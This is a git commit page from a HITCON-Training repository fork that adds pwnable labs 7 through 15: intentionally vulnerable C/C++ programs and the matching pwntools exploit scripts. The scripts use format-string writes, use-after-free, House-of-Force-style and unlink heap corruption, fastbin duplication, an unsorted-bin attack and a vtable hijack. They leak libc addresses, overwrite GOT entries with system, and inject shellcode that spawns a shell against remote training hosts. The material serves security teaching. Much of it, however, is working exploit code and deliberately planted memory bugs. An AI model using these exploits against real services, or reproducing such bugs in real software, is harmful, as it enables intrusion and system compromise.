dnrops
/
HITCON-Training
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

add all lab

This commit is contained in:
angelboy 2016-11-30 22:51:16 +08:00
parent 6e66417d3d
commit 340a58c46c
37 changed files with 1499 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
LAB/lab10/Makefile Normal file
View File

@ -0,0 +1,2 @@
hacknote:hacknote.c
gcc -m32 hacknote.c -o hacknote

BIN
LAB/lab10/hacknote Executable file
View File

Binary file not shown.

125
LAB/lab10/hacknote.c Normal file
View File

@ -0,0 +1,125 @@
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
struct note {
void (*printnote)();
char *content ;
};
struct note *notelist[5];
int count = 0;
void print_note_content(struct note *this){
puts(this->content);
}
void add_note(){
int i ;
char buf[8];
int size ;
if(count > 5){
puts("Full");
return ;
}
for(i = 0 ; i < 5 ; i ++){
if(!notelist[i]){
notelist[i] = (struct note*)malloc(sizeof(struct note));
if(!notelist[i]){
puts("Alloca Error");
exit(-1);
}
notelist[i]->printnote = print_note_content;
printf("Note size :");
read(0,buf,8);
size = atoi(buf);
notelist[i]->content = (char *)malloc(size);
if(!notelist[i]->content){
puts("Alloca Error");
exit(-1);
}
printf("Content :");
read(0,notelist[i]->content,size);
puts("Success !");
count++;
break;
}
}
}
void del_note(){
char buf[4];
int idx ;
printf("Index :");
read(0,buf,4);
idx = atoi(buf);
if(idx < 0 || idx >= count){
puts("Out of bound!");
_exit(0);
}
if(notelist[idx]){
free(notelist[idx]->content);
free(notelist[idx]);
puts("Success");
}
}
void print_note(){
char buf[4];
int idx ;
printf("Index :");
read(0,buf,4);
idx = atoi(buf);
if(idx < 0 || idx >= count){
puts("Out of bound!");
_exit(0);
}
if(notelist[idx]){
notelist[idx]->printnote(notelist[idx]);
}
}
void magic(){
system("cat /home/hacknote/flag");
}
void menu(){
puts("----------------------");
puts(" HackNote ");
puts("----------------------");
puts(" 1. Add note ");
puts(" 2. Delete note ");
puts(" 3. Print note ");
puts(" 4. Exit ");
puts("----------------------");
printf("Your choice :");
};
int main(){
setvbuf(stdout,0,2,0);
setvbuf(stdin,0,2,0);
char buf[4];
while(1){
menu();
read(0,buf,4);
switch(atoi(buf)){
case 1 :
add_note();
break ;
case 2 :
del_note();
break ;
case 3 :
print_note();
break ;
case 4 :
exit(0);
break ;
default :
puts("Invalid choice");
break ;
}
}
return 0;
}

40
LAB/lab10/hacknote.py Normal file
View File

@ -0,0 +1,40 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwnpwnpwn import *
from pwn import *
host = "training.pwnable.tw"
port = 11010
r = remote(host,port)
def addnote(size,content):
r.recvuntil(":")
r.sendline("1")
r.recvuntil(":")
r.sendline(str(size))
r.recvuntil(":")
r.sendline(content)
def delnote(idx):
r.recvuntil(":")
r.sendline("2")
r.recvuntil(":")
r.sendline(str(idx))
def printnote(idx):
r.recvuntil(":")
r.sendline("3")
r.recvuntil(":")
r.sendline(str(idx))
magic = 0x08048986
system = 0x8048506
addnote(32,"ddaa")
addnote(32,"ddaa")
addnote(32,"ddaa")
delnote(0)
delnote(1)
addnote(8,p32(magic))
printnote(0)
r.interactive()

2
LAB/lab11/Makefile Normal file
View File

@ -0,0 +1,2 @@
bamboobox:bamboobox.c
gcc bamboobox.c -o bamboobox

BIN
LAB/lab11/bamboobox Executable file
View File

Binary file not shown.

195
LAB/lab11/bamboobox.c Normal file
View File

@ -0,0 +1,195 @@
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
struct item{
int size ;
char *name ;
};
struct item itemlist[100] = {0};
int num ;
void hello_message(){
puts("There is a box with magic");
puts("what do you want to do in the box");
}
void goodbye_message(){
puts("See you next time");
puts("Thanks you");
}
struct box{
void (*hello_message)();
void (*goodbye_message)();
};
void menu(){
puts("----------------------------");
puts("Bamboobox Menu");
puts("----------------------------");
puts("1.show the items in the box");
puts("2.add a new item");
puts("3.change the item in the box");
puts("4.remove the item in the box");
puts("5.exit");
puts("----------------------------");
printf("Your choice:");
}
void show_item(){
int i ;
if(!num){
puts("No item in the box");
}else{
for(i = 0 ; i < 100; i++){
if(itemlist[i].name){
printf("%d : %s",i,itemlist[i].name);
}
}
puts("");
}
}
int add_item(){
char sizebuf[8] ;
int length ;
int i ;
int size ;
if(num < 100){
printf("Please enter the length of item name:");
read(0,sizebuf,8);
length = atoi(sizebuf);
if(length == 0){
puts("invaild length");
return 0;
}
for(i = 0 ; i < 100 ; i++){
if(!itemlist[i].name){
itemlist[i].size = length ;
itemlist[i].name = (char*)malloc(length);
printf("Please enter the name of item:");
size = read(0,itemlist[i].name,length);
itemlist[i].name[size] = '\x00';
num++;
break;
}
}
}else{
puts("the box is full");
}
return 0;
}
void change_item(){
char indexbuf[8] ;
char lengthbuf[8];
int length ;
int index ;
int readsize ;
if(!num){
puts("No item in the box");
}else{
printf("Please enter the index of item:");
read(0,indexbuf,8);
index = atoi(indexbuf);
if(itemlist[index].name){
printf("Please enter the length of item name:");
read(0,lengthbuf,8);
length = atoi(lengthbuf);
printf("Please enter the new name of the item:");
readsize = read(0,itemlist[index].name,length);
*(itemlist[index].name + readsize) = '\x00';
}else{
puts("invaild index");
}
}
}
void remove_item(){
char indexbuf[8] ;
int index ;
if(!num){
puts("No item in the box");
}else{
printf("Please enter the index of item:");
read(0,indexbuf,8);
index = atoi(indexbuf);
if(itemlist[index].name){
free(itemlist[index].name);
itemlist[index].name = 0 ;
itemlist[index].size = 0 ;
puts("remove successful!!");
num-- ;
}else{
puts("invaild index");
}
}
}
void magic(){
int fd ;
char buffer[100];
fd = open("/home/bamboobox/flag",O_RDONLY);
read(fd,buffer,sizeof(buffer));
close(fd);
printf("%s",buffer);
exit(0);
}
int main(){
char choicebuf[8];
int choice;
struct box *bamboo ;
setvbuf(stdout,0,2,0);
setvbuf(stdin,0,2,0);
bamboo = malloc(sizeof(struct box));
bamboo->hello_message = hello_message;
bamboo->goodbye_message = goodbye_message ;
bamboo->hello_message();
while(1){
menu();
read(0,choicebuf,8);
choice = atoi(choicebuf);
switch(choice){
case 1:
show_item();
break;
case 2:
add_item();
break;
case 3:
change_item();
break;
case 4:
remove_item();
break;
case 5:
bamboo->goodbye_message();
exit(0);
break;
default:
puts("invaild choice!!!");
break;
}
}
return 0 ;
}

44
LAB/lab11/bamboobox1.py Normal file
View File

@ -0,0 +1,44 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwnpwnpwn import *
from pwn import *
host = "training.pwnable.tw"
port = 11011
r = remote(host,port)
def additem(length,name):
r.recvuntil(":")
r.sendline("2")
r.recvuntil(":")
r.sendline(str(length))
r.recvuntil(":")
r.sendline(name)
def modify(idx,length,name):
r.recvuntil(":")
r.sendline("3")
r.recvuntil(":")
r.sendline(str(idx))
r.recvuntil(":")
r.sendline(str(length))
r.recvuntil(":")
r.sendline(name)
def remove(idx):
r.recvuntil(":")
r.sendline("4")
r.recvuntil(":")
r.sendline(str(idx))
def show():
r.recvuntil(":")
r.sendline("1")
magic = 0x400d49
additem(0x60,"ddaa")
modify(0,0x70,"a"*0x60 + p64(0) + p64(0xffffffffffffffff))
additem(-160,"dada")
additem(0x20,p64(magic)*2)
r.interactive()

64
LAB/lab11/bamboobox2.py Normal file
View File

@ -0,0 +1,64 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
host = "training.pwnable.tw"
port = 11011
r = remote(host,port)
def additem(length,name):
r.recvuntil(":")
r.sendline("2")
r.recvuntil(":")
r.sendline(str(length))
r.recvuntil(":")
r.sendline(name)
def modify(idx,length,name):
r.recvuntil(":")
r.sendline("3")
r.recvuntil(":")
r.sendline(str(idx))
r.recvuntil(":")
r.sendline(str(length))
r.recvuntil(":")
r.sendline(name)
def remove(idx):
r.recvuntil(":")
r.sendline("4")
r.recvuntil(":")
r.sendline(str(idx))
def show():
r.recvuntil(":")
r.sendline("1")
additem(0x40,"a"*8)
additem(0x80,"b"*8)
additem(0x40,"c"*8)
ptr = 0x6020c8
fake_chunk = p64(0) #prev_size
fake_chunk += p64(0x41) #size
fake_chunk += p64(ptr-0x18) #fd
fake_chunk += p64(ptr-0x10) #bk
fake_chunk += "c"*0x20
fake_chunk += p64(0x40)
fake_chunk += p64(0x90)
modify(0,0x80,fake_chunk)
remove(1)
payload = p64(0)*2
payload += p64(0x40) + p64(0x602068)
modify(0,0x80,payload)
show()
r.recvuntil("0 : ")
atoi = u64(r.recvuntil(":")[:6].ljust(8,"\x00"))
libc = atoi - 0x36e80
print "libc:",hex(libc)
system = libc + 0x45390
modify(0,0x8,p64(system))
r.recvuntil(":")
r.sendline("sh")
r.interactive()

2
LAB/lab12/Makefile Normal file
View File

@ -0,0 +1,2 @@
secretgarden:secretgarden.c
gcc secretgarden.c -o secretgarden

47
LAB/lab12/secret.py Normal file
View File

@ -0,0 +1,47 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwnpwnpwn import *
from pwn import *
host = "training.pwnable.tw"
port = 11012
r = remote(host,port)
def raiseflower(length,name,color):
r.recvuntil(":")
r.sendline("1")
r.recvuntil(":")
r.sendline(str(length))
r.recvuntil(":")
r.sendline(name)
r.recvuntil(":")
r.sendline(color)
def visit():
r.recvuntil(":")
r.sendline("2")
def remove(idx):
r.recvuntil(":")
r.sendline("3")
r.recvuntil(":")
r.sendline(str(idx))
def clean():
r.recvuntil(":")
r.sendline("4")
magic = 0x400c7b
fake_chunk = 0x601ffa
raiseflower(0x50,"da","red")
raiseflower(0x50,"da","red")
remove(0)
remove(1)
remove(0)
raiseflower(0x50,p64(fake_chunk),"blue")
raiseflower(0x50,"da","red")
raiseflower(0x50,"da","red")
raiseflower(0x50,"a"*6 + p64(0) + p64(magic)*2 ,"red")
r.interactive()

BIN
LAB/lab12/secretgarden Executable file
View File

Binary file not shown.

171
LAB/lab12/secretgarden.c Normal file
View File

@ -0,0 +1,171 @@
#include <stdio.h>
#include <signal.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define TIMEOUT 60
struct flower{
int vaild ;
char *name ;
char color[24] ;
};
struct flower* flowerlist[100] ;
unsigned int flowercount = 0 ;
void menu(){
puts("");
puts("☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ");
puts("☆ Baby Secret Garden ☆ ");
puts("☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ");
puts("");
puts(" 1 . Raise a flower " );
puts(" 2 . Visit the garden ");
puts(" 3 . Remove a flower from the garden");
puts(" 4 . Clean the garden");
puts(" 5 . Leave the garden");
puts("");
printf("Your choice : ");
}
int add(){
struct flower *newflower = NULL ;
char *buf = NULL ;
unsigned size =0;
unsigned index ;
if(flowercount < 100){
newflower = malloc(sizeof(struct flower));
memset(newflower,0,sizeof(struct flower));
printf("Length of the name :");
if(scanf("%u",&size)== EOF) exit(-1);
buf = (char*)malloc(size);
if(!buf){
puts("Alloca error !!");
exit(-1);
}
printf("The name of flower :");
read(0,buf,size);
newflower->name = buf ;
printf("The color of the flower :");
scanf("%23s",newflower->color);
newflower->vaild = 1 ;
for(index = 0 ; index < 100 ; index++ ){
if(!flowerlist[index]){
flowerlist[index] = newflower ;
break ;
}
}
flowercount++ ;
puts("Successful !");
}else{
puts("The garden is overflow");
}
}
int del(){
unsigned int index ;
if(!flowercount){
puts("No flower in the garden");
}else{
printf("Which flower do you want to remove from the garden:");
scanf("%d",&index);
if(index < 0 ||index >= 100 || !flowerlist[index]){
puts("Invalid choice");
return 0 ;
}
(flowerlist[index])->vaild = 0 ;
free((flowerlist[index])->name);
puts("Successful");
}
}
void magic(){
int fd ;
char buffer[100];
fd = open("/home/babysecretgarden/flag",O_RDONLY);
read(fd,buffer,sizeof(buffer));
close(fd);
printf("%s",buffer);
exit(0);
}
void clean(){
unsigned index ;
for(index = 0 ; index < 100 ; index++){
if(flowerlist[index] && (flowerlist[index])->vaild == 0){
free(flowerlist[index]);
flowerlist[index] = NULL;
flowercount--;
}
}
puts("Done!");
}
int visit(){
unsigned index ;
if(!flowercount){
puts("No flower in the garden !");
}else{
for(index = 0 ; index < 100 ; index++){
if(flowerlist[index] && (flowerlist[index])->vaild){
printf("Name of the flower[%u] :%s\n",index,(flowerlist[index])->name);
printf("Color of the flower[%u] :%s\n",index,(flowerlist[index])->color);
}
}
}
}
void handler(int signum){
puts("timeout");
exit(1);
}
void init(){
int fd;
fd = open("/dev/urandom",0);
close(fd);
setvbuf(stdout,0,2,0);
signal(SIGALRM,handler);
alarm(TIMEOUT);
}
int main(){
init();
int choice ;
char buf[10];
while(1){
menu();
read(0,buf,8);
choice = atoi(buf);
switch(choice){
case 1:
add();
break ;
case 2:
visit();
break ;
case 3:
del();
break ;
case 4:
clean();
break ;
case 5:
puts("See you next time.");
exit(0);
default :
puts("Invalid choice");
break ;
}
}
}

2
LAB/lab13/Makefile Normal file
View File

@ -0,0 +1,2 @@
heapcreator:heapcreator.c
gcc heapcreator.c -o heapcreator

BIN
LAB/lab13/heapcreator Executable file
View File

Binary file not shown.

152
LAB/lab13/heapcreator.c Normal file
View File

@ -0,0 +1,152 @@
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void read_input(char *buf,size_t size){
int ret ;
ret = read(0,buf,size);
if(ret <=0){
puts("Error");
_exit(-1);
}
}
struct heap {
size_t size ;
char *content ;
};
struct heap *heaparray[10];
void menu(){
puts("--------------------------------");
puts(" Heap Creator ");
puts("--------------------------------");
puts(" 1. Create a Heap ");
puts(" 2. Edit a Heap ");
puts(" 3. Show a Heap ");
puts(" 4. Delete a Heap ");
puts(" 5. Exit ");
puts("--------------------------------");
printf("Your choice :");
}
void create_heap(){
int i ;
char buf[8];
size_t size = 0;
for(i = 0 ; i < 10 ; i++){
if(!heaparray[i]){
heaparray[i] = (struct heap *)malloc(sizeof(struct heap));
if(!heaparray[i]){
puts("Allocate Error");
exit(1);
}
printf("Size of Heap : ");
read(0,buf,8);
size = atoi(buf);
heaparray[i]->content = (char *)malloc(size);
if(!heaparray[i]->content){
puts("Allocate Error");
exit(2);
}
heaparray[i]->size = size ;
printf("Content of heap:");
read_input(heaparray[i]->content,size);
puts("SuccessFul");
break ;
}
}
}
void edit_heap(){
int idx ;
char buf[4];
printf("Index :");
read(0,buf,4);
idx = atoi(buf);
if(idx < 0 || idx >= 10){
puts("Out of bound!");
_exit(0);
}
if(heaparray[idx]){
printf("Content of heap : ");
read_input(heaparray[idx]->content,heaparray[idx]->size+1);
puts("Done !");
}else{
puts("No such heap !");
}
}
void show_heap(){
int idx ;
char buf[4];
printf("Index :");
read(0,buf,4);
idx = atoi(buf);
if(idx < 0 || idx >= 10){
puts("Out of bound!");
_exit(0);
}
if(heaparray[idx]){
printf("Size : %ld\nContent : %s\n",heaparray[idx]->size,heaparray[idx]->content);
puts("Done !");
}else{
puts("No such heap !");
}
}
void delete_heap(){
int idx ;
char buf[4];
printf("Index :");
read(0,buf,4);
idx = atoi(buf);
if(idx < 0 || idx >= 10){
puts("Out of bound!");
_exit(0);
}
if(heaparray[idx]){
free(heaparray[idx]->content);
free(heaparray[idx]);
heaparray[idx] = NULL ;
puts("Done !");
}else{
puts("No such heap !");
}
}
int main(){
char buf[4];
setvbuf(stdout,0,2,0);
setvbuf(stdin,0,2,0);
while(1){
menu();
read(0,buf,4);
switch(atoi(buf)){
case 1 :
create_heap();
break ;
case 2 :
edit_heap();
break ;
case 3 :
show_heap();
break ;
case 4 :
delete_heap();
break ;
case 5 :
exit(0);
break ;
default :
puts("Invalid Choice");
break;
}
}
return 0 ;
}

58
LAB/lab13/heapcreator.py Normal file
View File

@ -0,0 +1,58 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwnpwnpwn import *
from pwn import *
host = "training.pwnable.tw"
port = 11013
#host = "10.211.55.28"
#port = 8888
r = remote(host,port)
def create(size,content):
r.recvuntil(":")
r.sendline("1")
r.recvuntil(":")
r.sendline(str(size))
r.recvuntil(":")
r.sendline(content)
def edit(idx,content):
r.recvuntil(":")
r.sendline("2")
r.recvuntil(":")
r.sendline(str(idx))
r.recvuntil(":")
r.sendline(content)
def show(idx):
r.recvuntil(":")
r.sendline("3")
r.recvuntil(":")
r.sendline(str(idx))
def delete(idx):
r.recvuntil(":")
r.sendline("4")
r.recvuntil(":")
r.sendline(str(idx))
free_got = 0x602018
create(0x18,"dada") # 0
create(0x10,"ddaa") # 1
edit(0, "/bin/sh\x00" +"a"*0x10 + "\x41")
delete(1)
create(0x30,p64(0)*4 +p64(0x30) + p64(free_got)) #1
show(1)
r.recvuntil("Content : ")
data = r.recvuntil("Done !")
free_addr = u64(data.split("\n")[0].ljust(8,"\x00"))
libc = free_addr - 0x83940
print "libc:",hex(libc)
system = libc + 0x45390
edit(1,p64(system))
delete(0)
r.interactive()

2
LAB/lab14/Makefile Normal file
View File

@ -0,0 +1,2 @@
magicheap:magicheap.c
gcc magicheap.c -o magicheap

BIN
LAB/lab14/magicheap Executable file
View File

Binary file not shown.

134
LAB/lab14/magicheap.c Normal file
View File

@ -0,0 +1,134 @@
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void read_input(char *buf,size_t size){
int ret ;
ret = read(0,buf,size);
if(ret <=0){
puts("Error");
_exit(-1);
}
}
char *heaparray[10];
unsigned long int magic = 0 ;
void menu(){
puts("--------------------------------");
puts(" Magic Heap Creator ");
puts("--------------------------------");
puts(" 1. Create a Heap ");
puts(" 2. Edit a Heap ");
puts(" 3. Delete a Heap ");
puts(" 4. Exit ");
puts("--------------------------------");
printf("Your choice :");
}
void create_heap(){
int i ;
char buf[8];
size_t size = 0;
for(i = 0 ; i < 10 ; i++){
if(!heaparray[i]){
printf("Size of Heap : ");
read(0,buf,8);
size = atoi(buf);
heaparray[i] = (char *)malloc(size);
if(!heaparray[i]){
puts("Allocate Error");
exit(2);
}
printf("Content of heap:");
read_input(heaparray[i],size);
puts("SuccessFul");
break ;
}
}
}
void edit_heap(){
int idx ;
char buf[4];
size_t size ;
printf("Index :");
read(0,buf,4);
idx = atoi(buf);
if(idx < 0 || idx >= 10){
puts("Out of bound!");
_exit(0);
}
if(heaparray[idx]){
printf("Size of Heap : ");
read(0,buf,8);
size = atoi(buf);
printf("Content of heap : ");
read_input(heaparray[idx] ,size);
puts("Done !");
}else{
puts("No such heap !");
}
}
void delete_heap(){
int idx ;
char buf[4];
printf("Index :");
read(0,buf,4);
idx = atoi(buf);
if(idx < 0 || idx >= 10){
puts("Out of bound!");
_exit(0);
}
if(heaparray[idx]){
free(heaparray[idx]);
heaparray[idx] = NULL ;
puts("Done !");
}else{
puts("No such heap !");
}
}
void l33t(){
system("cat /home/magicheap/flag");
}
int main(){
char buf[8];
setvbuf(stdout,0,2,0);
setvbuf(stdin,0,2,0);
while(1){
menu();
read(0,buf,8);
switch(atoi(buf)){
case 1 :
create_heap();
break ;
case 2 :
edit_heap();
break ;
case 3 :
delete_heap();
break ;
case 4 :
exit(0);
break ;
case 4869 :
if(magic > 4869){
puts("Congrt !");
l33t();
}else
puts("So sad !");
break ;
default :
puts("Invalid Choice");
break;
}
}
return 0 ;
}

51
LAB/lab14/magicheap.py Normal file
View File

@ -0,0 +1,51 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
host = "training.pwnable.tw"
port = 11014
r = remote(host,port)
def create_heap(size,content):
r.recvuntil(":")
r.sendline("1")
r.recvuntil(":")
r.sendline(str(size))
r.recvuntil(":")
r.sendline(content)
def edit_heap(idx,size,content):
r.recvuntil(":")
r.sendline("2")
r.recvuntil(":")
r.sendline(str(idx))
r.recvuntil(":")
r.sendline(str(size))
r.recvuntil(":")
r.sendline(content)
def del_heap(idx):
r.recvuntil(":")
r.sendline("3")
r.recvuntil(":")
r.sendline(str(idx))
create_heap(0x80,"dada") # 0
create_heap(0x20,"dada") # 1
create_heap(0x80,"dada") # 2
create_heap(0x20,"dada") # 3
del_heap(2)
del_heap(0)
magic = 0x6020c0
fd = 0
bk = magic - 0x10
edit_heap(1,0x20+0x20,"a"*0x20 + p64(0) + p64(0x91) + p64(fd) + p64(bk))
create_heap(0x80,"dada") #trigger unsorted bin attack
r.recvuntil(":")
r.sendline("4869")
r.interactive()

2
LAB/lab15/Makefile Normal file
View File

@ -0,0 +1,2 @@
zoo:zoo.cpp
g++ -z execstack zoo.cpp -o zoo

BIN
LAB/lab15/zoo Executable file
View File

Binary file not shown.

185
LAB/lab15/zoo.cpp Normal file
View File

@ -0,0 +1,185 @@
#include <stdio.h>
#include <iostream>
#include <unistd.h>
#include <vector>
#include <string.h>
using namespace std;
char nameofzoo[100];
class Animal {
public :
Animal(){
memset(name,0,24);
weight = 0;
}
virtual void speak(){;}
virtual void info(){;}
protected :
char name[24];
int weight;
};
class Dog : public Animal{
public :
Dog(string str,int w){
strcpy(name,str.c_str());
weight = w ;
}
virtual void speak(){
cout << "Wow ~ Wow ~ Wow ~" << endl ;
}
virtual void info(){
cout << "|---------------------|" << endl ;
cout << "| Animal info |" << endl;
cout << "|---------------------|" << endl;
cout << " Weight :" << this->weight << endl ;
cout << " Name : " << this->name << endl ;
cout << "|---------------------|" << endl;
}
};
class Cat : public Animal{
public :
Cat(string str,int w){
strcpy(name,str.c_str());
weight = w ;
}
virtual void speak(){
cout << "Meow ~ Meow ~ Meow ~" << endl ;
}
virtual void info(){
cout << "|---------------------|" << endl ;
cout << "| Animal info |" << endl;
cout << "|---------------------|" << endl;
cout << " Weight :" << this->weight << endl ;
cout << " Name : " << this->name << endl ;
cout << "|---------------------|" << endl;
}
};
vector<Animal *> animallist ;
void menu(){
cout << "*********************************" << endl ;
cout << " 1. Add a dog " << endl ;
cout << " 2. Add a cat " << endl ;
cout << " 3. Listen a animal " << endl ;
cout << " 4. Show a animal info " << endl ;
cout << " 5. Remove a animal " << endl ;
cout << " 6. Exit " << endl ;
cout << "*********************************" << endl ;
}
void adddog(){
string name ;
int weight ;
cout << "Name : " ;
cin >> name;
cout << "Weight : " ;
cin >> weight ;
Dog *mydog = new Dog(name,weight);
animallist.push_back(mydog);
}
void addcat(){
string name ;
int weight ;
cout << "Name : " ;
cin >> name;
cout << "Weight : " ;
cin >> weight ;
Cat *mycat = new Cat(name,weight);
animallist.push_back(mycat);
}
void remove(){
unsigned int idx ;
if(animallist.size() == 0){
cout << "no any animal!" << endl ;
return ;
}
cout << "index of animal : ";
cin >> idx ;
if(idx >= animallist.size()){
cout << "out of bound !" << endl;
return ;
}
delete animallist[idx];
animallist.erase(animallist.begin()+idx);
}
void showinfo(){
unsigned int idx ;
if(animallist.size() == 0){
cout << "no any animal!" << endl ;
return ;
}
cout << "index of animal : ";
cin >> idx ;
if(idx >= animallist.size()){
cout << "out of bound !" << endl;
return ;
}
animallist[idx]->info();
}
void listen(){
unsigned int idx ;
if(animallist.size() == 0){
cout << "no any animal!" << endl ;
return ;
}
cout << "index of animal : ";
cin >> idx ;
if(idx >= animallist.size()){
cout << "out of bound !" << endl;
return ;
}
animallist[idx]->speak();
}
int main(void){
unsigned int choice ;
setvbuf(stdout,0,2,0);
setvbuf(stdin,0,2,0);
cout << "Name of Your zoo :" ;
read(0,nameofzoo,100);
while(1){
menu();
cout << "Your choice :";
cin >> choice ;
cout << endl ;
switch(choice){
case 1 :
adddog();
break ;
case 2 :
addcat();
break ;
case 3 :
listen();
break ;
case 4 :
showinfo();
break ;
case 5 :
remove();
break ;
case 6 :
_exit(0);
default :
cout << "Invaild choice" << endl;
break ;
}
}
return 0 ;
}

41
LAB/lab15/zoo.py Normal file
View File

@ -0,0 +1,41 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
host = "training.angelboy.tw"
port = 11015
context.arch = "amd64"
r = remote(host,port)
sc = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
def add_dog(name,weight):
r.recvuntil(":")
r.sendline("1")
r.recvuntil(":")
r.sendline(name)
r.recvuntil(":")
r.sendline(str(weight))
def remove_ani(idx):
r.recvuntil(":")
r.sendline("5")
r.recvuntil(":")
r.sendline(str(idx))
name = 0x605420
r.recvuntil(":")
r.sendline("a"*8 + p64(name+8) + sc)
add_dog("a"*8,0)
add_dog("b"*8,1)
remove_ani(0)
vptr = name + 8
add_dog("a"*72 + p64(vptr),2)
r.recvuntil(":")
r.sendline("3")
r.recvuntil(":")
r.sendline("0")
r.interactive()

2
LAB/lab7/Makefile Normal file
View File

@ -0,0 +1,2 @@
crack:crack.c
gcc -m32 crack.c -o crack

BIN
LAB/lab7/crack Executable file
View File

Binary file not shown.

29
LAB/lab7/crack.c Normal file
View File

@ -0,0 +1,29 @@
#include <stdio.h>
#include <unistd.h>
#include <time.h>
#include <stdlib.h>
unsigned int password ;
int main(){
setvbuf(stdout,0,2,0);
char buf[100];
char input[16];
int fd ;
srand(time(NULL));
fd = open("/dev/urandom",0);
read(fd,&password,4);
printf("What your name ? ");
read(0,buf,99);
printf("Hello ,");
printf(buf);
printf("Your password :");
read(0,input,15);
if(atoi(input) != password){
puts("Goodbyte");
}else{
puts("Congrt!!");
system("cat /home/crack/flag");
}
}

21
LAB/lab7/crack.py Normal file
View File

@ -0,0 +1,21 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
host = "training.pwnable.tw"
port = 11007
r = remote(host,port)
password_addr = 0x804a048
r.recvuntil("?")
r.sendline(p32(password_addr) + "#" + "%10$s" + "#" )
r.recvuntil("#")
p = r.recvuntil("#")
password = u32(p[:4])
r.recvuntil(":")
r.sendline(str(password))
r.interactive()

2
LAB/lab8/Makefile Normal file
View File

@ -0,0 +1,2 @@
craxme:craxme.c
gcc -m32 craxme.c -o craxme

BIN
LAB/lab8/craxme Executable file
View File

Binary file not shown.

20
LAB/lab8/craxme.c Normal file
View File

@ -0,0 +1,20 @@
#include <stdio.h>
int magic = 0 ;
int main(){
char buf[0x100];
setvbuf(stdout,0,2,0);
puts("Please crax me !");
printf("Give me magic :");
read(0,buf,0x100);
printf(buf);
if(magic == 0xda){
system("cat /home/craxme/flag");
}else if(magic == 0xfaceb00c){
system("cat /home/craxme/craxflag");
}else{
puts("You need be a phd");
}
}

41
LAB/lab8/craxme.py Normal file
View File

@ -0,0 +1,41 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwnpwnpwn import *
from pwn import *
#host = "10.211.55.28"
#port = 8888
host = "training.angelboy.tw"
port = 11008
r = remote(host,port)
def fmt(prev,word,index):
if prev < word :
result = word - prev
fmtstr = "%" + str(result) + "c"
elif prev == word :
result = 0
else :
result = 256 - prev + word
fmtstr = "%" + str(result) + "c"
fmtstr += "%" + str(index) + "$hhn"
return fmtstr
magic = 0x804a038
payload = p32(magic)
payload += p32(magic+1)
payload += p32(magic+2)
payload += p32(magic+3)
targat = 0xfaceb00c
prev = 4*4
for i in range(4):
payload += fmt(prev,(targat >> 8*i) & 0xff,7+i)
prev = (targat >> 8*i) & 0xff
r.recvuntil(":")
r.sendline(payload)
r.interactive()

34
LAB/lab8/craxme2.py Normal file
View File

@ -0,0 +1,34 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
host = "training.pwnable.tw"
port = 11008
r = remote(host,port)
printf_got = 0x804a010
puts_got = 0x804a018
system_plt = 0x8048410
target = 0x0804859b
payload = p32(puts_got)
payload += p32(puts_got+1)
payload += p32(puts_got+2)
payload += p32(puts_got+3)
payload += p32(printf_got)
payload += p32(printf_got+1)
payload += p32(printf_got+2)
payload += p32(printf_got+3)
prev = 4*8
for i in range(4):
payload += fmtchar(prev,(target >> i*8) & 0xff,7+i)
prev = (target >> i*8) & 0xff
for i in range(4):
payload += fmtchar(prev,(system_plt >> i*8) & 0xff,11+i)
prev = (system_plt >> i*8) & 0xff
r.recvuntil(":")
r.sendline(payload)
r.interactive()

2
LAB/lab9/Makefile Normal file
View File

@ -0,0 +1,2 @@
playfmt:playfmt.c
gcc -m32 playfmt.c -o playfmt

BIN
LAB/lab9/playfmt Executable file
View File

Binary file not shown.

29
LAB/lab9/playfmt.c Normal file
View File

@ -0,0 +1,29 @@
#include <stdio.h>
#include <unistd.h>
#include <string.h>
char buf[200] ;
void do_fmt(){
while(1){
read(0,buf,200);
if(!strncmp(buf,"quit",4))
break;
printf(buf);
}
return ;
}
void play(){
puts("=====================");
puts(" Magic echo Server");
puts("=====================");
do_fmt();
return;
}
int main(){
setvbuf(stdout,0,2,0);
play();
return;
}